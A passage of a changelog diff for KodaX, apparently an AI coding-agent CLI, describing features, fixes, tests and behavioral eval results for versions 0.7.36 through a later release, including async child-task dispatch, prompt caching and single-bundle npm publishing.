+ - **CLI users**: zero migration needed. The `\n\n---\n\n` batched-drain separator only affects how multiple queued prompts are sent to the LLM; user-side input is unchanged. The new ↑ gesture on empty input replaces the previous no-op (history was never wired here).
97
+ - **`@kodax-ai/coding` SDK consumers calling `executeChildAgents` directly**: read-only children are byte-equivalent to v0.7.37. Write children's `systemPromptOverride` now contains additional `AGENTS.md`-derived content when the parent context has a discoverable AGENTS.md. If you were asserting equality against `CHILD_AGENT_SYSTEM_PROMPT`, switch to `startsWith` or use the now-exported const directly.
98
+ - **Tools with custom interrupt semantics**: `LocalToolDefinition.interruptBehavior` defaults to `'wait'` if unset — no change for existing custom tools. Set it to `'cancel'` only for tools that block on observable wall-clock time (network IO, sleep, child-task wait) where a user follow-up should redirect immediately.
99
+
100
+ ### Verified
101
+
102
+ **RC (2026-05-09)**:
103
+
104
+ - All 262 affected test files pass (`npm run test` — `packages/coding`, `packages/repl/src/ui/utils`, `packages/repl/src/ui/contexts`, `tests/tracker-consistency.test.ts`).
105
+ - New: `packages/repl/src/ui/utils/queued-prompt-sequence-latency.test.ts` (handoff floor < 5ms + 50ms-floor sanity check).
106
+ - New: `tests/feature-149-batched-drain.eval.ts` + `benchmark/datasets/feature-149-batched-drain/cases.test.ts` (4 cases, 30 hermetic shape tests; pilot eval skips when API keys absent).
107
+ - New: 4 cases in `packages/coding/src/child-executor.test.ts` for FEATURE_117 v2 mutation context injection.
108
+ - `npm run build` (`tsc -b tsconfig.build.json`) green.
109
+
110
+ **Post-RC (2026-05-11)**:
111
+
112
+ - Full repo suite green except 1 pre-existing failure unrelated to this delivery (`tests/acp_server.test.ts` — permission-request count expectation, fails on HEAD without any of this delivery's changes; tracked separately).
113
+ - New: 14 attack-surface hardening tests for `packages/repl/src/permission/bash-ast.ts` (FEATURE_152).
114
+ - New: ~30 tests across `packages/coding/src/guardrails/auto-mode/bash-prefix-extractor.test.ts` + extractor integration (FEATURE_153).
115
+ - New: 33 unit tests pinning `idle-yield.ts` foundation utilities + 35 tests for `Runner.run` outer-loop wiring (FEATURE_155 Slice A1/A2).
116
+ - New: 10 tests for `ObserverBridge.idleWaiting()` + status-bar consumer (FEATURE_156).
117
+ - New: `packages/repl/src/interactive/storage.test.ts` "FEATURE_157 — lists same-repo sessions across drive-letter case differences" (skipped on Linux; runs on win32 + darwin).
118
+ - New: 2 pinning tests in `worker-role-prompt.test.ts` for FEATURE_151 Slice I fan-out plan granularity.
119
+ - Eval ship gates met: FEATURE_155 Slice B1 chat-while-waiting (3/5 alias ≥80% after adding zhipu/glm51), FEATURE_151 Slice I fan-out plan granularity (3/5 alias ≥80% positive AND ≤20% negative-trigger after v2 prompt rewrite).
120
+ - `npm run build` (`tsc -b tsconfig.build.json`) green; type-check clean across all packages.
121
+
122
+ ### Known not-in-scope
123
+
124
+ - **Mid-tool-call prompt injection** (streaming a new user message to the LLM while a tool is still executing) — conflicts with cancel-then-reissue boundaries; deferred to v0.7.43+.
125
+ - **Soft-pause state machine** — FEATURE_111 v0.7.43 scope.
126
+ - **Council / multi-advisor consult** — FEATURE_105 v0.7.46 scope.
127
+ - **Read-child cost-stripping** — v1 of FEATURE_117 was abandoned; read children already minimal.
128
+
129
+ ---
130
+
131
+ ## [0.7.37] - 2026-05-08
132
+
133
+ ### Theme
134
+
135
+ **Six-feature delivery — Active Cache Control Foundation, Transcript Inline Diff Renderer, v0.7.36 Behavioral Eval Follow-ups, npm Publishing Pipeline + Single-Bundle Architecture Pivot, Pattern B Anti-Immediate-Await Rule.** v0.7.37 ships FEATURE_116 (prompt cache control as a first-class client primitive — Anthropic-compat lowers `cache_control:{type:'ephemeral'}` markers; OpenAI-compat + ACP strip the abstraction; Sub-task 116-D extends the OpenAI-compat usage parser with DeepSeek's private `prompt_cache_hit_tokens` / `prompt_cache_miss_tokens` field shape so cache hits actually surface in `/cost`), FEATURE_141 (REPL parses existing unified-diff text in tool results, renders colored hunks via the new `DiffHunk` Ink component — A-plan, zero wire-format change, zero coding-package change; ToolCallDisplay also gains tool-output surfacing that previous KodaX versions silently dropped), FEATURE_146 (the LLM-judge multi-alias behavioral validation that v0.7.36 deferred — 5 alias × 5/10/12 task probes for FEATURE_119 Pattern B parallel dispatch / FEATURE_131-B Unicode edit fallback / FEATURE_143 prompt-overlay position migration; all three pass their pre-registered ship gates), FEATURE_147 phases 4.1-4.3 (npm scope rename `@kodax/*` → `@kodax-ai/*`, `@kodax/ai` → `@kodax-ai/llm`, publish-only fields + lean-tarball tsconfig exclusion + release pipeline script), FEATURE_148 (Pattern B anti-immediate-await rule in the Worker role-prompt + behavioral eval), and **FEATURE_150 — single-bundle npm distribution architecture** (multi-package publish replaced with esbuild bundle of root entry; only `@kodax-ai/cli` ships to npm; ADR-022 + HLD §12 record the architecture decision and 5 known risks with applied mitigations). Also includes a `kodax -c` UX fix that stops leaking the prior task's Scout/Worker role-prompt into the resumed transcript.
136
+
137
+ > **⚠️ Hotfix Note (2026-05-08)**: FEATURE_147 Phase 4.4 (multi-package real `npm publish`) was attempted on 2026-05-08 and revealed three P0 runtime-deps bugs (`@kodax-ai/coding` missing 4 declared deps; `@kodax-ai/repl` missing 26 vendored Ink fork transitive deps; `@kodax-ai/skills` 6 helper scripts hard-coding the obsolete `@kodax/coding` scope). All 10 packages were `npm unpublish`'d. Rather than re-republish in 24h with multi-package mode, FEATURE_150 pivots npm distribution to a single bundled `@kodax-ai/cli` (esbuild bundle inlines all 9 sub-packages; only the root publishes; sub-packages remain independently usable from source via git clone — see ADR-022 §"Reasoning"). The same v0.7.37 version number reships 24h after unpublish under the new architecture.
138
+
139
+ ### Added
140
+
141
+ - **FEATURE_116 — Active Cache Control Foundation** (commits `41436fd`, `cfe7e4c`, `c842f5a`, `81ac799`, `262246c`, `1e91fce`, `101f060`) — Single boundary abstraction `KodaXCacheBoundary` (`packages/ai/src/types.ts`) lowered in 3 provider base classes, **not** 13 subclasses: `KodaXAnthropicCompatProvider` lowers to wire-level `cache_control:{type:'ephemeral'}` markers on the last system block + tools-array tail (Anthropic / Zhipu-coding / Kimi-code / MiniMax-coding / MiMo-coding / ARK-coding cover 6 of 13 providers); `KodaXOpenAICompatProvider` strips the boundary marker (OpenAI / DeepSeek auto prefix-cache; Kimi / Qwen / Zhipu OpenAI-compat have no client-side cache surface — Kimi/Zhipu/Qwen self-cache via separate `cache_id` REST endpoint deferred to v0.7.45+ with FEATURE_102); `KodaXAcpProvider` strips (CLI bridge subprocesses don't see wire format). `cost-tracker.ts` gains `cacheHitRate` field + `/cost` report breakdown. ~70 LOC implementation total (vs the ~360 LOC the design doc originally estimated for the 12-subclass approach). Anthropic acceptance: 5-minute TTL window, 5 consecutive Worker turns achieve ≥70% cache hit rate after the warming first turn. 8 structural ship-gate tests in `tests/feature-116-active-cache-control.eval.ts` + human test guide in `docs/test-guides/FEATURE_116_v0.7.37_TEST_GUIDE.md`. Anthropic provider gains a serialization fail-loud guard so any cache-boundary leakage to wire produces an immediate exception (reviewer CRITICAL #1 from Phase 1.2).
142
+ - **Sub-task 116-D** (commit `101f060`) — extends `normalizeOpenAIUsage` with a fallback chain to read DeepSeek's private cache field shape (`usage.prompt_cache_hit_tokens` / `usage.prompt_cache_miss_tokens` at the top level) in addition to the OpenAI-standard nested `usage.prompt_tokens_details.cached_tokens`. OpenAI-standard wins on conflict for forward-compat. Without this fix, every DeepSeek request reported `cachedReadTokens: undefined` to KodaX's cost tracker — a *reporting* bug (DeepSeek bills cached input at the discounted rate regardless of client) but it broke the `/cost` UI (~4× over-statement at 80% hit rate), polluted FEATURE_098 cost projection / FEATURE_102 routing inputs, and confused users diff'ing KodaX cost vs the DeepSeek dashboard. 7 new focused tests in `packages/ai/src/providers/openai-usage-cache-fields.test.ts`; 148/148 existing provider tests + 48/48 cost-tracker tests still green. Kimi / Qwen / Zhipu use the OpenAI-standard nested form (verified via their docs), so the fallback is DeepSeek-specific in practice and zero-impact for the other three OpenAI-compat providers.
143
+
144
+ - **FEATURE_141 — Transcript Inline Diff Renderer** (commits `21bde6b`, `8bc36db`, `2ef471d`, `0e1b3d3`) — REPL renders unified-diff text from `edit` / `multi_edit` / `write` tool results with colored hunks. Three-layer A-plan: (1) `parse-unified-diff.ts` parser splits tool output text into `[ParsedDiffSegment]` (text segments + diff segments, anchored on `@@` headers); (2) `DiffHunk.tsx` Ink component renders each diff segment with `+` green / `-` red / `@@` gray + 16-line fold (8 head + 8 tail + middle ellipsis) for hunks > 16 lines (≤200 lines) and "diff too large" fallback for >200 lines; multi-edit / multi-file diffs handled via inner new-file lookahead. (3) `ToolCallDisplay.tsx` + new `ToolOutputBlock` surface the tool's `output` field for `edit` / `multi_edit` / `write` (output rendering was **never wired** in KodaX before this — design doc's "lacks colors" framing understated the gap; the field was silently dropped in transcript). Wire format unchanged: `KodaXToolResultBlock.content` stays a string, no schema migration, all 13 provider serialization paths untouched. Child agent diff inheritance is automatic when child summary text contains unified-diff (parser doesn't distinguish source). Theme awareness via existing diff color tokens with hardcoded fallback. Human test guide in `docs/test-guides/FEATURE_141_v0.7.37_TEST_GUIDE.md`. `DiffHunk` is `React.memo`'d by `tool_use_id` so a 100-edit turn doesn't thrash render.
145
+
146
+ - **FEATURE_146 — v0.7.36 Behavioral Eval Follow-ups (formally tracked, not implicit defer)** (commits `ea653a1`, `4d8b15c`, `110b84a`) — The LLM-judge multi-alias behavioral validation that v0.7.36 explicitly tracked into v0.7.37 as a load-bearing quality gate. Three sub-features ship as independent patches that **don't block main-line v0.7.37 ship** (per design doc rollback policy):
147
+ - **A. FEATURE_143 prompt-overlay position migration behavioral eval** (`tests/feature-146-a-prompt-overlay-behavioral.eval.ts` + `benchmark/datasets/prompt-overlay-position/`) — 5 alias × 6 task × 2 variant = 60 cells. Per-task pass-rate delta B-section vs A-legacy: 5 tasks 0pp, 1 task **+20pp (B better)**. Aggregate A=87%, B=**90%**. ✅ PASS gates: no per-task regression > 10pp; aggregate B ≥ 50%. Strongest possible evidence v0.7.36 didn't silently degrade overlay-driven behavior.
148
+ - **B. FEATURE_119 Pattern B parallel-dispatch behavioral eval** (`tests/feature-146-b-pattern-b-behavioral.eval.ts` + `benchmark/datasets/pattern-b-parallel-decision/`) — 5 alias × 5 task = 25 cells; trigger rate 76-88% across two sweeps (well above 60% PASS gate). Per-alias: zhipu 3/5 (consistently lowest), kimi/mmx/ds 4-5/5. Orphan rate downgraded to informational (single-turn probe cannot test multi-turn await; mockChildExecutor primitive deferred to v0.7.38+). ✅ PASS.
149
+ - **C. FEATURE_131-B Unicode edit fallback behavioral eval** (`tests/feature-146-c-unicode-edit-fallback-behavioral.eval.ts` + `benchmark/datasets/unicode-edit-fallback/`) — 5 alias × 10 task = 50 cells. byte-exact=48, unicode-rescue=0, both-miss=2, **false-positive=0**, no-edit-call=0. legacy match = unicode match = 48/50 (parity). ✅ PASS gates: false-positive=0; Unicode treatment ≥ legacy baseline (no regression). 0 unicode-rescue events is informational reading: 2026-era LLMs across these 5 aliases are conservative about Unicode emission — the fallback is insurance for the silent-fail tail (CJK paste, web-doc paste, older models), not a daily-use code path.
150
+
151
+ - **FEATURE_147 — npm Publishing Pipeline (Phase 4.1 + 4.2 + 4.3)** (commits `a840f22`, `633c01a`) — Three of four phases shipped. **Phase 4.1 + 4.2** (`refactor(packages,v0.7.37)`): scope rename `@kodax/*` → `@kodax-ai/*` across 530+38+11 = 579 TypeScript imports + 26 `package.json` deps + 6 tsconfig paths; `@kodax/ai` → `@kodax-ai/llm` to remove the awkward `@kodax-ai/ai` repetition (directory `packages/ai/` retained — only the package `name` field changed, avoiding a git-history-breaking cross-directory rename). `scripts/patch-publish-fields.mjs` adds `files: ["dist", "README.md", "LICENSE"]` + `publishConfig: { access: "public" }` to all 9 sub-packages and rewrites internal deps from `*` to `*` (no-op normalization — the workspace-protocol approach was rejected when npm 11 surfaced `EUNSUPPORTEDPROTOCOL`; deps stay `*` locally and substitute to `^<version>` at publish time). **Phase 4.3** (`feat(scripts,v0.7.37)`): `scripts/release-npm.mjs` orchestrated the multi-package publish (since deleted — see FEATURE_150). `scripts/exclude-tests-from-build.mjs` adds `**/*.test.ts(x)` + `**/__tests__/**` to all 9 sub-package tsconfig excludes — keeps source builds lean. **Phase 4.4 (actual multi-package `npm publish`)** was **abandoned** after the first sweep revealed three P0 runtime-deps bugs (see Hotfix Note above). The npm distribution architecture pivots to single-bundle in **FEATURE_150**.
152
+
153
+ - **FEATURE_150 — Single-bundle npm distribution** (this release window) — Pivots npm distribution from "10 separate packages" to "1 bundled `@kodax-ai/cli`". Source-layer monorepo unchanged (ADR-001 / ADR-021 still hold; 9 sub-packages remain independently usable via `git clone + npm link / file:`). Publish-layer simplified: `scripts/build-bundle.mjs` runs esbuild against three entries — `src/kodax_cli.ts` → `dist/kodax_cli.js` (CLI bin entry), `src/index.ts` → `dist/index.js` (SDK entry consumed by builtin helper scripts and path-B SDK consumers via `package.json#exports`), and verbatim copy of `packages/skills/dist/builtin/` → `dist/builtin/`. All 9 internal `@kodax-ai/*` source modules are inlined into the bundle via esbuild's transitive import tracking. All third-party packages (45 total: 17 root + 26 vendored Ink fork transitives + `typescript` `tsx` `zod`) stay external and are listed in root `package.json#dependencies`. Helper scripts in `packages/skills/src/builtin/skill-creator/scripts/` (6 files) gain a `loadKodaXSDK()` helper in `utils.js` that resolves the SDK via `import.meta.url`-relative path with bare-name fallbacks for dev / monorepo modes. `scripts/release-npm.mjs` and `scripts/publish-root-cli.mjs` deleted; replaced by `scripts/release.mjs` (build → rewrite root pkg name to `@kodax-ai/cli` + drop `private` + normalize bin paths → npm publish to registry.npmjs.org → restore pristine bytes via try/finally). Tarball size: 1.0 MB gzipped / 3.3 MB unpacked / 44 files (47% smaller than v0.7.37 multi-package total of ~1.9 MB across 10 tarballs). Architecture decision recorded in **ADR-022**; bundle layout, three integration paths (CLI users / source SDK consumers / npm SDK consumers), and 5 known risks (`tsx` external; vendored Ink fork transitives; helper-script path hardcoding; opt-in source maps; bundle size DCE) with applied mitigations recorded in **HLD §12**. Risk 3 mitigation: `react-devtools-core` is intercepted by an esbuild plugin and stubbed to no-op exports — ink's vendored fork dynamic-imports devtools only when `process.env.DEV='true'` but esbuild hoists the import to module top, where react-devtools-core's CJS `backend.js` evaluates `self.X = ...` and fails under Node.js. The stub eliminates this load-time path entirely (production CLI never enters dev branch).
154
+
155
+ - **FEATURE_148 — Pattern B anti-immediate-await rule** (commit `df72ae8`) — Worker role-prompt now carries an explicit ANTI-PATTERN rule forbidding `await_child_task` immediately after `dispatch_child_task` when there is other useful work to do (additional dispatches, side-reads the user requested, synthesis planning, prefetched context). Awaiting immediately collapses Pattern B (FEATURE_119 v0.7.36) back to a synchronous call with extra steps. The rule embeds a concrete example: *"if the user asks 'do X (slow) AND also do Y (cheap)' — dispatch X, then DO Y, then await X."* Backed by a unit test asserting the rule string ships in the rendered prompt + a behavioral eval dataset (`benchmark/datasets/pattern-b-post-dispatch-probe`) + eval driver (`tests/feature-148-post-dispatch-probe.eval.ts`) + human test guide (`docs/test-guides/FEATURE_148_v0.7.37_BEHAVIORAL_EVAL.md`). Closes the qualitative miss FEATURE_146-B's single-turn structural eval couldn't see.
156
+
157
+ ### Fixed
158
+
159
+ - **`kodax -c` transcript leak — system messages no longer rendered as bubbles on session resume** (commit `7aabbc1`) — `extractHistorySeedsFromMessage` in `packages/repl/src/ui/utils/message-utils.ts` previously passed `role: 'system'` messages through to the restored history as `type: "system"` bubbles. System messages in KodaX are LLM-internal scaffolding (Scout/Generator/Planner/Evaluator role-prompts, capability-sections, AMA controller metadata, repo-intelligence snapshots) — never user-facing. On `kodax -c` the prior task's full Scout role-prompt (including its cwd, repo snapshot, MCP list, and `Original user request:`) was being re-rendered into the new transcript as a "System [HH:MM]" bubble, leaking task-internal context to the user. Fix: `case "system"` now returns `[]` unconditionally; live-session user-visible banners go through `addHistoryItem` directly, not this restore path, so filtering at restore is safe. 3 new tests pin the behavior; full `@kodax-ai/repl` suite (1088 tests) regression-clean. Pre-existing bug since FEATURE_061 v0.7.16 introduced Scout-first AMA — not a v0.7.37 regression, but caught and fixed in the v0.7.37 release window.
160
+
161
+ - **Test harness flake under heavy parallel load** (commit `d4a47bc`) — Vitest's 5s default per-test timeout was being exceeded by git/subprocess/IO/`runKodaX` operations when ~4800 tests run concurrently. Logic was sound — single-test runs always passed; the flake was purely wall-clock contention. Following the v0.7.34 Issue 128 precedent (10 contract suites bumped to 15s), this commit raises per-test timeouts on 4 specific suites: `benchmark/harness/worktree-runner.test.ts` (`GIT_TEST_TIMEOUT = 20_000` for 6 git-shelling tests), `benchmark/harness/h2-boundary-runner.test.ts` (30s → 60s on 4 cells), `packages/coding/src/agent.provider-policy.test.ts` (90s → 180s on 2 `runKodaX` integration tests — critical because vitest's per-test timeout aborts the it-block but does NOT cancel the in-flight `provider.stream`, so a timeout cascades a leaked tool-call into the next test's `calls.length` assertion bucket), and `tests/sa-refactor-goldens/selection.test.ts` (30s on 2 corpus-scanning tests over `~/.kodax/sessions/*.jsonl`). Global `testTimeout` untouched so unit-test perf regressions still surface fast. Verified: 4848/4848 tests green in 107s on the full sweep.
162
+
163
+ ### Tested
164
+
165
+ - **5 new eval files** under `tests/`:
166
+ - `feature-116-active-cache-control.eval.ts` — 8 structural ship-gate tests (FEATURE_116)
167
+ - `feature-146-a-prompt-overlay-behavioral.eval.ts` — 5×6×2=60 cell LLM-judge eval (FEATURE_143 follow-up)
168
+ - `feature-146-b-pattern-b-behavioral.eval.ts` — 5×5=25 cell LLM-judge eval (FEATURE_119 follow-up)
169
+ - `feature-146-c-unicode-edit-fallback-behavioral.eval.ts` — 5×10=50 cell LLM-judge eval (FEATURE_131-B follow-up)
170
+ - `feature-148-post-dispatch-probe.eval.ts` — multi-turn anti-immediate-await behavioral eval (FEATURE_148)
171
+ - **4 new dataset directories** under `benchmark/datasets/` — `prompt-overlay-position/`, `pattern-b-parallel-decision/`, `unicode-edit-fallback/`, `pattern-b-post-dispatch-probe/` (all version-tracked with cases.ts + README.md per FEATURE_104 v2 convention)
172
+ - **`packages/ai/src/providers/openai-usage-cache-fields.test.ts`** — 7 focused tests pinning the DeepSeek private-cache-field fallback chain (FEATURE_116-D).
173
+ - **First behavioral sweep total** for FEATURE_146: ~135 LLM cells (60+25+50) cost ≈ $2.70 wall-clock total ~10 minutes serial. All three sweeps PASS pre-registered gates.
174
+ - **Per-test timeout bumps** on 4 flaky suites (worktree-runner / h2-boundary-runner / agent.provider-policy / sa-refactor-goldens — see Fixed section above) eliminate false-positive flakes under the full ~4800-test parallel run. 4848/4848 green in 107s on the full sweep.
175
+ - Build green; type-check clean; full test suite regression-clean against v0.7.36 baseline.
176
+
177
+ ### Migration notes
178
+
179
+ - **No breaking changes** for runtime users on the SA path or AMA path. FEATURE_116 cache_control markers are ignored by providers that don't honor them; FEATURE_141 is REPL-render-only and adds no new wire fields; FEATURE_146 is eval infrastructure with no runtime surface.
180
+ - **SDK consumers via `git clone + npm link`** must rename imports from `@kodax/*` to `@kodax-ai/*` (and `@kodax/ai` → `@kodax-ai/llm`) — the migration sed helper is documented in `docs/features/v0.7.37.md` § FEATURE_147 Migration impact. CLI users (the dominant audience) see zero impact: `git clone + kodax help` continues to work, and after FEATURE_150 reships, `npm install -g @kodax-ai/cli` is the new install-by-name path (single bundle).
181
+ - **SDK consumers expecting `@kodax-ai/coding` / `@kodax-ai/agent` / etc. as separate npm packages**: those 9 packages are no longer published to npm under FEATURE_150. The two supported integration paths are now: (path A) `git clone + npm link/file: + bundle your own product with esbuild` (recommended for SDK integrators — KodaX's own monorepo workflow is the same shape); (path B) `npm install @kodax-ai/cli + import { runKodaX, ... } from '@kodax-ai/cli'` (the bundled root re-exports SDK API via `package.json#exports`; binds your SDK upgrades to CLI version cadence — acceptable for small integrations). See HLD §12.2 for the integration-path table.
182
+ - **Behavioral eval gates as continuous quality regression**: the 3 new eval files run on demand (skip when API keys absent) and become the load-bearing v0.7.37+ regression guard for the v0.7.36 LLM-facing changes. Re-run triggers documented per dataset README.
183
+
184
+ ### Quality gate posture (honest)
185
+
186
+ v0.7.36 shipped with structural eval + dataset regression (no API keys) for the three LLM-facing changes (FEATURE_119 / FEATURE_131-B / FEATURE_143) and explicitly tracked the LLM-judge multi-alias behavioral eval as `FEATURE_146` for v0.7.37. **v0.7.37 closes that gap**: 135 cells across 3 sweeps × 5 production aliases (zhipu/glm51, kimi, mmx/m27, ds/v4pro, ds/v4flash); all three sweeps PASS pre-registered ship gates with margin (FEATURE_146-A B-section actually outperformed legacy on the hardest task; FEATURE_146-B trigger rate 76-88% vs 60% gate; FEATURE_146-C false-positive=0 + parity match rate). The behavioral validation that was implicitly deferred at v0.7.36 ship is **explicitly load-bearing for v0.7.37**.
187
+
188
+ ---
189
+
190
+ ## [0.7.36] - 2026-05-07
191
+
192
+ ### Theme
193
+
194
+ **Six-feature delivery — async dispatch (Pattern B), provider Retry-After + exponential backoff, file-mutation queue + Unicode normalization, Skill UX + prompt-overlay 错位修正, AMA Harness V2 foundation, Message Queue.** Every feature originally scoped for v0.7.36 ships in this release — nothing is deferred. Two of the six (FEATURE_114 V2 single-loop runner, FEATURE_115 mid-turn drain UX-polish) ship as foundation surfaces gated behind `KODAX_HARNESS_V2` (default-off) and the existing `KODAX_ASYNC_DISPATCH=0` escape hatch, so the on-by-default behavior is byte-equivalent to v0.7.35.1 for the SA path and additive for AMA. Net: 14 commits across 9 packages (12 feature commits + 2 release-ops); 3683 unit tests + 26 eval/regression tests passing; build green on Windows + POSIX.
195
+
196
+ ### Added
197
+
198
+ - **FEATURE_115 — Message Queue foundation + mid-turn drain** (commits `5294e6b`, `ebb46de`, `a4bccca`, `d33b5d1`, `a76097e`) — Two-tier MessageQueue (`user` priority + `background` priority) with agent-id routing in `@kodax/agent`, fed by REPL `pendingInputs` (1B mirror), drained mid-turn at runner-driven yield points (1C), with a documented FEATURE_111-absorbed soft-pause UX (1D) and a child task-notification helper that lets dispatched children surface settle events back into the parent's MessageQueue without blocking the parent's tool loop (1E). Pre-existing `@kodax/agent ↔ @kodax/session-lineage` build cycle fixed in 1A as part of the foundation work. Mid-turn drain is currently gated to runner-driven AMA only — SA path unchanged. The queue is the substrate FEATURE_119's async dispatch (Phase 2A) and FEATURE_130's retry-after notifications (Phase 2B) ride on top of.
199
+ - **FEATURE_119 — Pattern B async dispatch** (commit `ebdf58f`) — `dispatch_child_task` and `await_child_task` are now separate tools. Sync path retained as `KODAX_ASYNC_DISPATCH=0` escape hatch; default async path launches the executor without awaiting, registers the in-flight handle in `ctx.childTaskRegistry` (substrate-level, shared between SA + AMA paths), fires `enqueueChildTaskNotification` on settle, and returns a `task_id:<id>` banner so the parent can decide when to await. `await_child_task` is the regular awaiter, registers worktree finalization, deletes the registry entry on completion, and surfaces live status via `ctx.reportToolProgress`. Wired into Scout/Generator role tool sets only (Planner/Evaluator do not dispatch children). Excluded from child-executor's tool set (children cannot recursively dispatch). 10 behavioral tests in `tools/async-dispatch.test.ts`.
200
+ - **FEATURE_130 — Provider Retry-After + Exponential Backoff** (commit `9139852`) — All 12 provider adapters (Anthropic, OpenAI, DeepSeek, Kimi, Qwen, Zhipu, MiniMax, MiMo, Gemini CLI, Codex CLI, …) now honor 429/503/529 `Retry-After` headers across 4 forms: integer-seconds, HTTP-date, `retry-after-ms`, and exponential-backoff fallback when no header is present. Helper `parseRetryAfter` + `extractHeadersFromError` lives in `@kodax/ai/retry/retry-after.ts` and is consumed centrally in `withRateLimit` so every `KodaXBaseProvider` subclass inherits the behavior without per-adapter wiring. `withRateLimit` accepts an optional `onRetryAfter` callback that fires before the retry sleep with `{ provider, attempt, maxAttempts, waitMs, source: 'header' | 'backoff' }`. `KodaXProviderStreamOptions.onRetryAfter`, `KodaXEvents.onRetryAfter`, and a new `recordRetry`/`RetryRecord` cost-tracker channel propagate the event through `run-substrate.ts`, `stream-handler-wiring.ts`, and into the Ink REPL surface as `[Rate limited] (provider) — retrying in Xs [source] (attempt/max)`. Cost report now appends a "Retries: N (Ys total wait)" line. `isRateLimitError` keyword set extended with `overload`/`overwhelmed`/`503`/`529`/`busy`. 22 unit tests in `retry-after.test.ts` cover all 4 forms, Headers API extraction, clamping, jitter, and concurrent-safety.
201
+ - **FEATURE_131 — File Mutation Queue + Edit Unicode Normalization** (commit `190356a`) — `withFileMutation` (path-keyed serialization) at `tools/_internal/file-mutation-queue.ts` wraps `edit` / `multi-edit` / `write` / `insert-after-anchor` so concurrent mutations to the same file serialize through a single in-process queue while different files proceed in parallel. `normalizePathForKey` is platform-aware: Windows lowercases the entire path (NTFS is case-insensitive); POSIX preserves component case but normalizes separators. `KODAX_PATH_KEY_PLATFORM` env override exposed for hermetic tests. Edit / multi-edit / insert-after-anchor add a Unicode-normalized fallback before the legacy `NOT_FOUND` error: `normalizeForFuzzyMatch` runs NFKC, maps smart quotes (`""''`) to ASCII, em-dash (`—`) to `--`, en-dash (`–`) to `-`, non-breaking space + ideographic space to regular space — closing the most common LLM-needle vs file-haystack drift. Cross-process content-hash safety (FEATURE_125) explicitly stays in v0.7.41. 16 + 14 unit tests across `file-mutation-queue.test.ts` and `edit-unicode-normalize.test.ts`.
202
+ - **FEATURE_143 — Skill UX hardening + prompt-overlay position migration** (commits `29e5639`, `68be923`) — Two coupled deliverables. (1) **Skill UX**: `getSystemPromptSnippet()` in `@kodax/skills` now leads with a "BLOCKING REQUIREMENT: invoke the relevant Skill tool BEFORE generating any other response" directive so the LLM treats `/skill:<name>` as a load-bearing gate, not a hint. The classic readline REPL gains the same skills-prompt that the Ink REPL has had since v0.7.30. New `parseInlineSkillReferences` helper in `repl/interactive/commands.ts` recognizes inline `/skill:<name>` references mid-message (regex `/(^|\s)\/skill:([\w][\w.\-:]*)/g`, skips leading slash references which still go through `parseCommand`). (2) **prompt-overlay 错位修正**: the v0.7.26 FEATURE_084 stitched the AMA `plan.promptOverlay` (routing notes block: task-family guidance, work intent, brainstorm directives, provider-policy notes, explicit-reason trail) onto the user-prompt head in `runner-driven.ts`. The Worker received the bytes but read them as user input rather than platform truth — semantic drift vs the SA path's `capability-sections.ts` system-prompt injection. v0.7.36 routes the same string through `ManagedRolePromptContext.promptOverlay` so it lands as a system-prompt section, matching SA-path behavior across all 4 AMA roles (Scout / Planner / Generator / Evaluator). `runner-driven.ts:promptWithOverlay` now returns the bare `prompt` argument unmodified — bytes-only-once invariant pinned by a structural eval. 7 commands-parse tests + 3 structural eval tests in `tests/prompt-overlay-position-migration.eval.ts`.
203
+ - **FEATURE_114 — AMA Harness V2 foundation** (commit `75a3853`) — Foundation surfaces shipped behind `KODAX_HARNESS_V2` env flag (default-off, case-insensitive `'true'` only). New `PLANNED` harness profile across `@kodax/ai` (`KodaXHarnessProfile`), `@kodax/coding` (reasoning, budget, max-rounds tables — `200` budget cap, `8` max rounds), and the runner-driven harness tier order. New `runDeterministicEvaluator` helper at `task-engine/deterministic-evaluator.ts` spawns `build` / `test` / `lint` commands with default 90s timeout and returns `pass | fail | skipped | error` with stderr/stdout tails. Recognizes "Missing script" / "command not found" as `skipped` (not error). New `RunnerNudgeState` + `observeToolCall` + `maybeAppendPlanNudge` at `task-engine/runner-nudges.ts` — once-only emission after 5 read-tool calls (read/grep/glob/code_search/semantic_lookup) without a plan, threshold configurable. New `planBeforeMutate` warn-severity invariant at `agent-runtime/invariants/plan-before-mutate.ts` — gates on `recorder.todoUpdateCount === 0 && !recorder.workerTrivialDeclaration`, no-ops when fields absent so V1 path is unaffected. Coding-side invariant chain now ships 9 ids (was 8): the V2 `planBeforeMutate` coexists with V1's `harnessSelectionTiming` during the migration window. New `worker-role-prompt.ts` builder with PLAN-FIRST CONTRACT + SCOPE COMMITMENT + MUTATION DISCIPLINE + DISPATCH RULE A/B/C + Pattern B + EVALUATOR HANDOFF sections. Full V2 single-loop runner-driven path (Worker = Scout+Planner+Generator merge, Evaluator preserved as structural gate) lands in v0.7.37. 9 + 7 + 12 unit tests across `runner-nudges.test.ts` / `deterministic-evaluator.test.ts` / `worker-role-prompt.test.ts`. Existing 8-invariant assertions in `index.test.ts` and `feature-101-106-joint.test.ts` updated to expect 9.
204
+ - **`tests/prompt-overlay-position-migration.eval.ts` structural ship gate** (commit `68be923`) — 3 hermetic tests (no API keys) covering migration completeness across all 4 AMA roles, no-regression when overlay absent, and whitespace-only overlay treated as absent.
205
+ - **`tests/feature-119-pattern-b-async-dispatch.eval.ts` structural ship gate** — 9 hermetic tests covering the launch+await tool surface (both `dispatch_child_task` AND `await_child_task` registered), description load-bearing content (LLM gets WHEN-TO-USE / parallel-dispatch / `task_id:<id>` banner / background-notification anchors), Worker V2 prompt Pattern B integration, and default-on policy with `KODAX_ASYNC_DISPATCH=0` escape hatch.
206
+ - **`tests/feature-131-unicode-dataset-regression.eval.ts` dataset regression** — 12 representative needle/haystack pairs reconstructed from real-world LLM silent-edit-fail cases (smart quotes, em-dash where file has `--`, en-dash where file has `-`, nbsp, ideographic space, full-width Latin via NFKC, combined-artifact "real-world cocktail"), each asserting the legacy byte-exact fallback MISSES + the Unicode-normalized fallback finds a UNIQUE match. 2 true-negative cases guard against over-broad normalization (e.g. NFKC must not lowercase identifiers).
207
+
208
+ ### Tested
209
+
210
+ - **Cumulative test surface this release**: 3683 tests passing (coding 2097, repl 1056, ai 219, skills 18, agent contributions); plus 3 + 9 + 14 = 26 new eval/regression tests under `tests/*.eval.ts`. Build green; type-check clean; full regression run on Windows.
211
+
212
+ ### Quality gate posture (honest)
213
+
214
